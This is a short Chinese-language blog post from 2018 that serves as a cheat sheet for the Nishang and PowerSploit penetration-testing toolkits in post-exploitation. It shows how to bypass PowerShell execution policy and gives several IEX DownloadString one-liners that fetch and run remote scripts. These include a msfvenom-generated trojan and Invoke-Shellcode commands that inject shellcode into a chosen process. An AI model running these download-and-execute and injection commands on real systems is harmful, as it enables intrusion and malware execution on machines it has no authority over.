Nishang/PowerSploit工具脚本

3,193次阅读
没有评论

 

 nishang/powersploit都是针对powershell的渗透工具,提供了丰富powershell脚本,在后渗透的时候,不需要在靶机上上传任何工具,只要一个powershell,就可以远程下载执行脚本

1.Powershell

查看执行策略

Get-ExecutionPolicy

Restricted  //这是默认的设置。不能执行PowerShell脚本
AllSigned   //只有数字签名的脚本将会运行,此外,会提示你允许运行那些使用指定的证书签名的脚本
RemoteSigned    //经本地编写的脚本将会运行,从网络下载的脚本运行,除非他们签名了并且你批准了的签名的证书
UnRestricted    //所有的脚本都将运行

设置执行策略,需要管理员权限

 set-ExecutionPolicy

绕过执行策略执行脚本

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

//远程下载执行
IEX (New-Object Net.WebClient).DownloadString('url')
在cmd模式下:
powershell IEX (New-Object Net.WebClient).DownloadString('url')
powershell -c "IEX (New-Object Net.WebClient).DownloadString('url')"

2.Nishang

导入所有模块nishang

import-module ./nishang.psm1

get-command -module nishang     //查看命令

单独导入Invoke-PortScan脚本

IEX (New-Object Net.WebClient).DownloadString(“http://localhost/webTools/nishang/Scan/Invoke-PortScan.ps1”)

get-help Invoke-PortScan //查看使用方法

nishang提供了丰富的脚本Nishang/PowerSploit工具脚本

3.PowerSploit

 用法和nishang一样,有些重叠脚本

Invoke-Shellcode:将shellcode插入您选择的进程ID或本地PowerShell中

IEX (New-Object Net.WebClient).DownloadString(“http://Invoke-Shellcode.ps1”) //导入Invoke-Shellcode脚本
IEX (New-Object Net.WebClient).DownloadString(“http://msf.ps1”) //导入msfvenom生成的木马
Invoke-Shellcode -Shellcode ($buf) //直接运行
Invoke-Shellcode -ProcessID id -Shellcode($buf) -Force //进程注入运行

Hasukannal
版权声明:本站原创文章,由 Hasukannal 2018-12-01发表,共计1197字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)
验证码
载入中...